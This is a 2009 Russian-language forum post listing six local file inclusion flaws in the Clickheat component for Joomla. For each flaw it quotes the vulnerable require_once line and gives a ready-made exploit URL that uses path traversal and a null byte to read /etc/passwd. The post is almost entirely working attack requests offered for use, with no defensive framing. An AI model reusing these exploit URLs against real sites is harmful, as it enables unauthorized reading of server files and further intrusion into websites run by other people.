
28.04.2009, 18:04
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
Clickheat [fr Joomla]
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Vuln file: install.clickheat.php
Viln Code:
Код:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00
Vuln file: _main.php
Viln Code:
Код:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: main.php
Viln Code:
Код:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: Cache.php
Viln Code:
Код:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: Clickheat_Heatmap.php
Viln Code:
Код:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: GlobalVariables.php
Viln Code:
Код:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Нда вобщем-то...)
|
|
|